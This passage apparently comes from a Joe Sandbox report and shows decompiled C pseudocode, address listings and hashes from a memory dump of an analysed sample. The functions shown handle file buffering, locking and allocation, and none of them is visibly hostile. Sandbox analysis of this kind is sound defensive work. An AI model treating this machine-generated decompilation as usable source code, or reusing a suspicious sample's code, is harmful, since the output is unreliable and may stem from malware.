					return _t85;
				}
				_t155 = _a4;
				if( *((char*)(_t155 + 0x1d)) == 0) {
					L49:
					_t87 = E003B7852(_a8, _a12,  &_a4); // executed
					_t141 = _a16;
					_t123 = _a4;
					__eflags = _t141;
					if(_t141 != 0) {
						 *_t141 = _t123;
					}
					 *(_t155 + 0x28) =  *(_t155 + 0x28) + _t123;
					asm("adc [esi+0x2c], edx");
					 *(_t155 + 0x30) =  *(_t155 + 0x30) + _t123;
					asm("adc [esi+0x34], edx");
					__eflags = _t87;
					if(_t87 != 0) {
						goto L10;
					} else {
						_t85 = GetLastError();
						_t124 =  *(_t155 + 0x80);
						__eflags = _t124;
						if(_t124 == 0) {
							__eflags = _t85;
							if(__eflags != 0) {
								if(__eflags > 0) {
									_t85 = _t85 & 0x0000ffff | 0x80070000;
									__eflags = _t85;
								}
								goto L59;
							}
							L56:
							_t85 = 0x80004005;
							goto L59;
						}
						_t85 =  *((intOrPtr*)( *_t124))( *((intOrPtr*)(_t155 + 0x84)), _t85);
						goto L59;
					}
				}
				if( *((char*)(_t155 + 0x1e)) == 0) {
					L15:
					_t117 = _t155 + 0x44;
					while(1) {
						_t89 =  *(_t155 + 0x28);
						_t125 =  *((intOrPtr*)(_t155 + 0x2c));
						_v8 = _t125;
						_t149 = _t89 & 0xfffc0000;
						__eflags =  *_t117;
						if( *_t117 <= 0) {
							goto L19;
						}
						_t140 =  *(_t155 + 0x38);
						__eflags =  *(_t155 + 0x38) - _t149;
						if( *(_t155 + 0x38) != _t149) {
							goto L19;
						}
						_t140 =  *(_t155 + 0x3c);
						__eflags =  *(_t155 + 0x3c) - _t125;
						if( *(_t155 + 0x3c) == _t125) {
							_t120 =  *_t117;
							_t110 =  *(_t155 + 0x28) & 0x0003ffff;
							__eflags = _t110 - _t120;
							if(_t110 < _t120) {
								_t151 = _t120 - _t110;
								__eflags = _t151 - _a12;
								if(_t151 >= _a12) {
									_t151 = _a12;
								}
								memcpy(_a8,  *(_t155 + 0x40) + _t110, _t151);
								_t112 = _a16;
								 *(_t155 + 0x28) =  *(_t155 + 0x28) + _t151;
								asm("adc dword [esi+0x2c], 0x0");
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 =  *_t112 + _t151;
								}
							}
							goto L10;
						}
						L19:
						__eflags = _t89 & 0x0003ffff;
						if((_t89 & 0x0003ffff) != 0) {
							L25:
							__eflags = _t149 -  *(_t155 + 0x30);
							if(_t149 !=  *(_t155 + 0x30)) {
								L27:
								_t93 = E003B7407(_t155 + 0x18, _t140, _t149, _v8, 0,  &_v20);
								__eflags = _t93;
								if(_t93 == 0) {
									L42:
									_t85 = E003BB0EC();
									goto L59;
								} else {
									 *(_t155 + 0x30) = _v20;
									 *((intOrPtr*)(_t155 + 0x34)) = _v16;
									L29:
									__eflags =  *((char*)(_t155 + 0x1e));
									 *(_t155 + 0x38) = _t149;
									 *(_t155 + 0x3c) = _v8;
									_t150 = 0x40000;
									if( *((char*)(_t155 + 0x1e)) == 0) {
										L33:
										__eflags =  *(_t155 + 0x40);
										if( *(_t155 + 0x40) != 0) {
											L35:
											_t117 = _t155 + 0x44;
											_t97 = E003B7825(_t155 + 0x18,  *(_t155 + 0x40), _t150, _t117);
											__eflags = _t97;
											if(_t97 == 0) {
												goto L42;
											}
											_t98 =  *_t117;
											__eflags = _t98;
											if(_t98 == 0) {
												goto L10;
											}
											 *(_t155 + 0x30) =  *(_t155 + 0x30) + _t98;
											asm("adc dword [esi+0x34], 0x0");
											continue;
										}
										_t99 = E0040B350(0x40000);
										__eflags = _t99;
										 *(_t155 + 0x40) = _t99;
										if(_t99 == 0) {
											_t85 = 0x8007000e;
											goto L59;
										}
										goto L35;
									}
									_t140 =  *(_t155 + 0x24);
									_t101 =  *((intOrPtr*)(_t155 + 0x20)) -  *(_t155 + 0x30);
									__eflags = _t101;
									asm("sbb edx, [esi+0x34]");
									_v24 =  *(_t155 + 0x24);
									if(_t101 != 0) {
										L32:
										_t150 = 0x40000;
										goto L33;
									}
									__eflags = _t101 - 0x40000;
									_t150 = _t101;
									if(_t101 < 0x40000) {
										goto L33;
									}
									goto L32;
								}
							}
							__eflags = _v8 -  *((intOrPtr*)(_t155 + 0x34));
							if(_v8 ==  *((intOrPtr*)(_t155 + 0x34))) {
								goto L29;
							}
							goto L27;
						}
						__eflags = _a8 & 0x0003ffff;
						if((_a8 & 0x0003ffff) != 0) {
							goto L25;
						}
						_t140 = 0;
						_t131 = _a12 +  *(_t155 + 0x28);
						asm("adc edx, [esi+0x2c]");
						__eflags = _t131 & 0x0003ffff;
						if((_t131 & 0x0003ffff) == 0) {
							L39:
							_t106 =  *(_t155 + 0x28);
							_t132 =  *((intOrPtr*)(_t155 + 0x2c));
							__eflags = _t106 -  *(_t155 + 0x30);
							if(_t106 !=  *(_t155 + 0x30)) {
								L41:
								_t107 = E003B7407(_t155 + 0x18,  &_v20, _t106, _t132, 0,  &_v20);
								__eflags = _t107;
								if(_t107 != 0) {
									_t108 = _v20;
									_t134 = _v16;
									 *(_t155 + 0x28) = _t108;
									 *(_t155 + 0x30) = _t108;
									 *((intOrPtr*)(_t155 + 0x2c)) = _t134;
									 *((intOrPtr*)(_t155 + 0x34)) = _t134;
									goto L49;
								}
								goto L42;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t155 + 0x34));
							if(_t132 ==  *((intOrPtr*)(_t155 + 0x34))) {
								goto L49;
							}
							goto L41;
						}
						_t135 = _t131 & 0xfffc0000;
						__eflags = 0 -  *((intOrPtr*)(_t155 + 0x2c));
						if(__eflags > 0) {
							L38:
							_t136 = _t135 -  *(_t155 + 0x28);
							__eflags = _t136;
							_a12 = _t136;
							goto L39;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t135 -  *(_t155 + 0x28);
						if(_t135 >  *(_t155 + 0x28)) {
							goto L38;
						}
						goto L25;
					}
				}
				_t152 =  *((intOrPtr*)(_t155 + 0x2c));
				_t139 =  *(_t155 + 0x24);
				_t145 =  *(_t155 + 0x28);
				_t113 =  *((intOrPtr*)(_t155 + 0x20));
				_t163 = _t152 - _t139;
				if(_t163 < 0 || _t163 <= 0 && _t145 < _t113) {
					_t114 = _t113 - _t145;
					asm("sbb ecx, edi");
					_t140 = 0;
					__eflags = 0 - _t139;
					if(__eflags < 0) {
						goto L15;
					}
					if(__eflags > 0) {
						L14:
						_a12 = _t114;
						goto L15;
					}
					__eflags = _a12 - _t114;
					if(_a12 <= _t114) {
						goto L15;
					}
					goto L14;
				} else {
					if(_t145 != _t113 || _t152 != _t139) {
						goto L56;
					} else {
						goto L10;
					}
				}
			}










































                                                                                                    0x003bae6e
                                                                                                    0x003bae73
                                                                                                    0x003bae75
                                                                                                    0x003bae75
                                                                                                    0x003bae7f
                                                                                                    0x003baeba
                                                                                                    0x003baeba
                                                                                                    0x003bb0e5
                                                                                                    0x003bb0e9
                                                                                                    0x003bb0e9
                                                                                                    0x003bae81
                                                                                                    0x003bae88
                                                                                                    0x003bb076
                                                                                                    0x003bb083
                                                                                                    0x003bb088
                                                                                                    0x003bb08b
                                                                                                    0x003bb08e
                                                                                                    0x003bb090
                                                                                                    0x003bb092
                                                                                                    0x003bb092
                                                                                                    0x003bb096
                                                                                                    0x003bb099
                                                                                                    0x003bb09c
                                                                                                    0x003bb09f
                                                                                                    0x003bb0a2
                                                                                                    0x003bb0a4
                                                                                                    0x00000000
                                                                                                    0x003bb0aa
                                                                                                    0x003bb0aa
                                                                                                    0x003bb0b0
                                                                                                    0x003bb0b6
                                                                                                    0x003bb0b8
                                                                                                    0x003bb0ce
                                                                                                    0x003bb0d0
                                                                                                    0x003bb0d9
                                                                                                    0x003bb0e0
                                                                                                    0x003bb0e0
                                                                                                    0x003bb0e0
                                                                                                    0x00000000
                                                                                                    0x003bb0d9
                                                                                                    0x003bb0d2
                                                                                                    0x003bb0d2
                                                                                                    0x00000000
                                                                                                    0x003bb0d2
                                                                                                    0x003bb0c3
                                                                                                    0x00000000
                                                                                                    0x003bb0c3
                                                                                                    0x003bb0a4
                                                                                                    0x003bae92
                                                                                                    0x003baed5
                                                                                                    0x003baed5
                                                                                                    0x003baed8
                                                                                                    0x003baed8
                                                                                                    0x003baedb
                                                                                                    0x003baee0
                                                                                                    0x003baee3
                                                                                                    0x003baee9
                                                                                                    0x003baeec
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baeee
                                                                                                    0x003baef1
                                                                                                    0x003baef3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baef5
                                                                                                    0x003baef8
                                                                                                    0x003baefa
                                                                                                    0x003bb01e
                                                                                                    0x003bb020
                                                                                                    0x003bb025
                                                                                                    0x003bb027
                                                                                                    0x003bb02f
                                                                                                    0x003bb031
                                                                                                    0x003bb034
                                                                                                    0x003bb036
                                                                                                    0x003bb036
                                                                                                    0x003bb043
                                                                                                    0x003bb048
                                                                                                    0x003bb04e
                                                                                                    0x003bb051
                                                                                                    0x003bb055
                                                                                                    0x003bb057
                                                                                                    0x003bb05d
                                                                                                    0x003bb05d
                                                                                                    0x003bb057
                                                                                                    0x00000000
                                                                                                    0x003bb027
                                                                                                    0x003baf00
                                                                                                    0x003baf09
                                                                                                    0x003baf0b
                                                                                                    0x003baf45
                                                                                                    0x003baf45
                                                                                                    0x003baf48
                                                                                                    0x003baf52
                                                                                                    0x003baf5f
                                                                                                    0x003baf64
                                                                                                    0x003baf66
                                                                                                    0x003bb011
                                                                                                    0x003bb011
                                                                                                    0x00000000
                                                                                                    0x003baf6c
                                                                                                    0x003baf6f
                                                                                                    0x003baf75
                                                                                                    0x003baf78
                                                                                                    0x003baf7b
                                                                                                    0x003baf84
                                                                                                    0x003baf87
                                                                                                    0x003baf8a
                                                                                                    0x003baf8c
                                                                                                    0x003bafa7
                                                                                                    0x003bafa7
                                                                                                    0x003bafab
                                                                                                    0x003bafbd
                                                                                                    0x003bafbd
                                                                                                    0x003bafc8
                                                                                                    0x003bafcd
                                                                                                    0x003bafcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003bafd1
                                                                                                    0x003bafd3
                                                                                                    0x003bafd5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003bafdb
                                                                                                    0x003bafde
                                                                                                    0x00000000
                                                                                                    0x003bafde
                                                                                                    0x003bafad
                                                                                                    0x003bafb2
                                                                                                    0x003bafb4
                                                                                                    0x003bafb7
                                                                                                    0x003bb0c7
                                                                                                    0x00000000
                                                                                                    0x003bb0c7
                                                                                                    0x00000000
                                                                                                    0x003bafb7
                                                                                                    0x003baf91
                                                                                                    0x003baf94
                                                                                                    0x003baf94
                                                                                                    0x003baf97
                                                                                                    0x003baf9a
                                                                                                    0x003baf9d
                                                                                                    0x003bafa5
                                                                                                    0x003bafa5
                                                                                                    0x00000000
                                                                                                    0x003bafa5
                                                                                                    0x003baf9f
                                                                                                    0x003bafa1
                                                                                                    0x003bafa3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003bafa3
                                                                                                    0x003baf66
                                                                                                    0x003baf4d
                                                                                                    0x003baf50
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baf50
                                                                                                    0x003baf0d
                                                                                                    0x003baf10
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baf15
                                                                                                    0x003baf17
                                                                                                    0x003baf1a
                                                                                                    0x003baf23
                                                                                                    0x003baf25
                                                                                                    0x003bafed
                                                                                                    0x003bafed
                                                                                                    0x003baff0
                                                                                                    0x003baff3
                                                                                                    0x003baff6
                                                                                                    0x003baffd
                                                                                                    0x003bb008
                                                                                                    0x003bb00d
                                                                                                    0x003bb00f
                                                                                                    0x003bb064
                                                                                                    0x003bb067
                                                                                                    0x003bb06a
                                                                                                    0x003bb06d
                                                                                                    0x003bb070
                                                                                                    0x003bb073
                                                                                                    0x00000000
                                                                                                    0x003bb073
                                                                                                    0x00000000
                                                                                                    0x003bb00f
                                                                                                    0x003baff8
                                                                                                    0x003baffb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baffb
                                                                                                    0x003baf2b
                                                                                                    0x003baf31
                                                                                                    0x003baf34
                                                                                                    0x003bafe7
                                                                                                    0x003bafe7
                                                                                                    0x003bafe7
                                                                                                    0x003bafea
                                                                                                    0x00000000
                                                                                                    0x003bafea
                                                                                                    0x003baf3a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baf3c
                                                                                                    0x003baf3f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baf3f
                                                                                                    0x003baed8
                                                                                                    0x003bae94
                                                                                                    0x003bae97
                                                                                                    0x003bae9a
                                                                                                    0x003bae9d
                                                                                                    0x003baea0
                                                                                                    0x003baea2
                                                                                                    0x003baec1
                                                                                                    0x003baec3
                                                                                                    0x003baec5
                                                                                                    0x003baec7
                                                                                                    0x003baec9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baecb
                                                                                                    0x003baed2
                                                                                                    0x003baed2
                                                                                                    0x00000000
                                                                                                    0x003baed2
                                                                                                    0x003baecd
                                                                                                    0x003baed0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baeaa
                                                                                                    0x003baeac
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003baeac

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2523627151-0
                                                                                                    • Opcode ID: ee3903d75327c88a16c4b362bf2e3ba28dcf06023bf92ad1506aeca06bd2c938
                                                                                                    • Instruction ID: 92ddf1636bfe67f06f50cb8abe3c8316cd723f3d74e8b6a5f957d216f00fa07e
                                                                                                    • Opcode Fuzzy Hash: ee3903d75327c88a16c4b362bf2e3ba28dcf06023bf92ad1506aeca06bd2c938
                                                                                                    • Instruction Fuzzy Hash: 9A814771600B059FDB66DE25C980AEBB3F2BF44318F158A2DEA9687E40DB70F941CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417C80 Relevance: 2.6, APIs: 2, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 48%
                                                                                                    			E00417C80(void* __ecx, intOrPtr* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _t31;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t45;
				struct _CRITICAL_SECTION* _t54;
				void* _t55;
				void* _t61;

				_t55 = __ecx;
				_t38 = __edx;
				_t54 = __ecx + 0xb0;
				EnterCriticalSection(_t54);
				 *((intOrPtr*)(_t55 + 0xa0)) =  *((intOrPtr*)(_t55 + 0xa0)) + _a4;
				asm("adc edx, ecx");
				 *((intOrPtr*)(_t55 + 0xa8)) =  *((intOrPtr*)(_t55 + 0xa8)) + _a12;
				asm("adc ecx, eax");
				if( *((intOrPtr*)(_t55 + 0x9c)) == 0) {
					_t45 =  *((intOrPtr*)(_t55 + 0x98));
					if(_t45 != 0) {
						_t37 =  *_t45( *((intOrPtr*)(_t55 + 0xa0)),  *((intOrPtr*)(_t55 + 0xa4)),  *((intOrPtr*)(_t55 + 0xa8)),  *((intOrPtr*)(_t55 + 0xac))); // executed
						if(_t37 != 0) {
							 *((intOrPtr*)(_t55 + 0x9c)) = 0xa;
						}
					}
				}
				if( *((intOrPtr*)(_t55 + 0x88)) == 0) {
					L9:
					_t31 = 0;
					L10:
					 *_t38 = _t31;
					LeaveCriticalSection(_t54);
					return  *((intOrPtr*)(_t55 + 0x9c));
				}
				_t61 = _a24 -  *((intOrPtr*)(_t55 + 0x94));
				if(_t61 < 0 || _t61 <= 0 && _a20 <=  *((intOrPtr*)(_t55 + 0x90))) {
					goto L9;
				} else {
					_t31 = 1;
					goto L10;
				}
			}










                                                                                                    0x00417c82
                                                                                                    0x00417c85
                                                                                                    0x00417c87
                                                                                                    0x00417c8e
                                                                                                    0x00417ca8
                                                                                                    0x00417cb4
                                                                                                    0x00417cc8
                                                                                                    0x00417cd4
                                                                                                    0x00417ce4
                                                                                                    0x00417ce6
                                                                                                    0x00417cee
                                                                                                    0x00417d0c
                                                                                                    0x00417d10
                                                                                                    0x00417d12
                                                                                                    0x00417d12
                                                                                                    0x00417d10
                                                                                                    0x00417cee
                                                                                                    0x00417d24
                                                                                                    0x00417d4b
                                                                                                    0x00417d4b
                                                                                                    0x00417d4d
                                                                                                    0x00417d4d
                                                                                                    0x00417d56
                                                                                                    0x00417d61
                                                                                                    0x00417d61
                                                                                                    0x00417d30
                                                                                                    0x00417d32
                                                                                                    0x00000000
                                                                                                    0x00417d44
                                                                                                    0x00417d44
                                                                                                    0x00000000
                                                                                                    0x00417d44

                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00417308,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00417C8E
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00417308,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00417D56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168844106-0
                                                                                                    • Opcode ID: 8a18451e6d182fe91c964752bb7838b9a5c5343f1cb08b5d7b50a215917085df
                                                                                                    • Instruction ID: 93a4f145942ea2eb8c95ca89ec8a98797e237ed1fb3a0d6b51d77d407e81c839
                                                                                                    • Opcode Fuzzy Hash: 8a18451e6d182fe91c964752bb7838b9a5c5343f1cb08b5d7b50a215917085df
                                                                                                    • Instruction Fuzzy Hash: F121B275704B048FD764CA39D880BA7B3F6AF8A740F14882EE5AFC7304D734A8458B66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4686 Relevance: 2.5, APIs: 2, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E4686(intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t8;
				void* _t9;
				intOrPtr* _t12;

				EnterCriticalSection(0x43a878);
				_t8 = _a4;
				if( *((intOrPtr*)(_t8 + 0xbc)) != 0) {
					_t12 = _a8;
					if(_t12 != 0) {
						 *((intOrPtr*)(_t8 + 0x18)) =  *_t12;
						 *((intOrPtr*)(_t8 + 0x1c)) =  *((intOrPtr*)(_t12 + 4));
					}
					E003EB734(_t8 + 0x18); // executed
				}
				_t9 = E003E571F();
				LeaveCriticalSection(0x43a878);
				return _t9;
			}






                                                                                                    0x003e468e
                                                                                                    0x003e4694
                                                                                                    0x003e469f
                                                                                                    0x003e46a1
                                                                                                    0x003e46a7
                                                                                                    0x003e46ab
                                                                                                    0x003e46b1
                                                                                                    0x003e46b1
                                                                                                    0x003e46b7
                                                                                                    0x003e46b7
                                                                                                    0x003e46bc
                                                                                                    0x003e46c4
                                                                                                    0x003e46ce

                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(0043A878), ref: 003E468E
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A878), ref: 003E46C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168844106-0
                                                                                                    • Opcode ID: 9b07a5828da27f3fca220636a18c45bfdc9b9ff4e4046ecc280a649c9939ba29
                                                                                                    • Instruction ID: a3323ec3aa1bb191dfc8148a9eec9ad5649d25a9730350df871798786b3dea68
                                                                                                    • Opcode Fuzzy Hash: 9b07a5828da27f3fca220636a18c45bfdc9b9ff4e4046ecc280a649c9939ba29
                                                                                                    • Instruction Fuzzy Hash: BEF03035201260CFC309EF26D448D9677A5AFD9311F1685BEE4068B3A1C730DC46CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4640 Relevance: 2.5, APIs: 2, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E4640(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t8;
				void* _t9;

				EnterCriticalSection(0x43a878);
				_t8 = _a4;
				if( *((intOrPtr*)(_t8 + 0xbc)) != 0) {
					 *((intOrPtr*)(_t8 + 0x20)) = _a8;
					 *((intOrPtr*)(_t8 + 0x24)) = _a12;
					E003EB734(_t8 + 0x18); // executed
				}
				_t9 = E003E571F();
				LeaveCriticalSection(0x43a878);
				return _t9;
			}





                                                                                                    0x003e4648
                                                                                                    0x003e464e
                                                                                                    0x003e4659
                                                                                                    0x003e465f
                                                                                                    0x003e4666
                                                                                                    0x003e466c
                                                                                                    0x003e466c
                                                                                                    0x003e4671
                                                                                                    0x003e4679
                                                                                                    0x003e4683

                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(0043A878), ref: 003E4648
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A878), ref: 003E4679
                                                                                                      • Part of subcall function 003EB734: GetTickCount.KERNEL32 ref: 003EB749
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CountEnterLeaveTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 1056156058-0
                                                                                                    • Opcode ID: 5ee50f7b28144acb81cc42bc53c249abef09ddfef2ea9cfcd647ff83b576badf
                                                                                                    • Instruction ID: a31c0367824880744950bfc40a6cecdeb41f151864fbe4173f16d546d92f1207
                                                                                                    • Opcode Fuzzy Hash: 5ee50f7b28144acb81cc42bc53c249abef09ddfef2ea9cfcd647ff83b576badf
                                                                                                    • Instruction Fuzzy Hash: 12E03975204220CFC3099B25E548D9A77A5AF88311F0146BAE446873A1C7309C45CA75
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B1E0C Relevance: 2.5, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E003B1E0C(int _a4, char _a7) {
				void* _t7;
				char* _t9;

				if(_a4 == 0) {
					_a4 = 1;
				}
				_t7 = malloc(_a4); // executed
				if(_t7 == 0) {
					_push(0x430098);
					_t9 =  &_a7;
					_push(_t9);
					L0041F1D0();
					return _t9;
				}
				return _t7;
			}





                                                                                                    0x003b1e13
                                                                                                    0x003b1e15
                                                                                                    0x003b1e15
                                                                                                    0x003b1e1f
                                                                                                    0x003b1e28
                                                                                                    0x003b1e2d
                                                                                                    0x003b1e35
                                                                                                    0x003b1e38
                                                                                                    0x003b1e39
                                                                                                    0x00000000
                                                                                                    0x003b1e39
                                                                                                    0x003b1e3f

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrowmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2436765578-0
                                                                                                    • Opcode ID: 87960d8c0a5bb8a56e3900c5765836e88791d779fa1bf72d9009e9a06c52753e
                                                                                                    • Instruction ID: e1941ea5b11bec84446574681fe04539504f66997f3dfa4b11f6b5a0fa96f7eb
                                                                                                    • Opcode Fuzzy Hash: 87960d8c0a5bb8a56e3900c5765836e88791d779fa1bf72d9009e9a06c52753e
                                                                                                    • Instruction Fuzzy Hash: 10E0C23010024CBADF125FA1D8487D83F685B00358F80E02AFE0C8E615C674CBE58744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F6ECC Relevance: 2.2, APIs: 1, Instructions: 653COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 78%
                                                                                                    			E003F6ECC() {
				signed int _t359;
				signed int _t369;
				signed int _t370;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t383;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t419;
				signed int _t420;
				signed int _t427;
				signed int _t428;
				signed int _t430;
				signed int _t431;
				signed int _t436;
				signed int _t437;
				signed int _t439;
				signed int _t440;
				intOrPtr _t445;
				signed int _t447;
				signed int _t448;
				signed int _t455;
				signed int _t456;
				signed int _t458;
				signed int _t459;
				signed int _t464;
				signed int _t465;
				signed int _t467;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t490;
				signed int _t492;
				intOrPtr _t493;
				signed int _t496;
				signed int _t501;
				signed int _t502;
				signed int _t517;
				intOrPtr _t560;
				signed int _t566;
				signed int _t579;
				signed int _t582;
				signed int _t584;
				signed int _t586;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				signed int _t594;
				signed int _t596;
				signed int _t602;
				void* _t604;
				void* _t606;

				E0041F1B0(E0042757D, _t604);
				_t591 =  *(_t604 + 0x18);
				_t485 = _t591;
				 *((intOrPtr*)(_t604 - 0x10)) = _t606 - 0xb0;
				 *(_t604 - 4) = 0;
				 *(_t604 - 0x14) = _t485;
				if(_t591 != 0) {
					 *((intOrPtr*)( *_t591 + 4))(_t591);
				}
				 *((intOrPtr*)(_t604 - 0x40)) = 0;
				 *(_t604 - 0x3c) = 0;
				_t602 =  *(_t604 + 8);
				 *(_t604 + 0x1b) =  *((intOrPtr*)(_t604 + 0x10)) == 0xffffffff;
				 *(_t604 - 4) = 1;
				if( *(_t604 + 0x1b) != 0) {
					 *((intOrPtr*)(_t604 + 0x10)) =  *((intOrPtr*)(_t602 + 0x10c));
				}
				_t350 = 0;
				if( *((intOrPtr*)(_t604 + 0x10)) != 0) {
					_t592 = _t591 | 0xffffffff;
					__eflags = 0;
					while(1) {
						__eflags = _t350 -  *((intOrPtr*)(_t604 + 0x10));
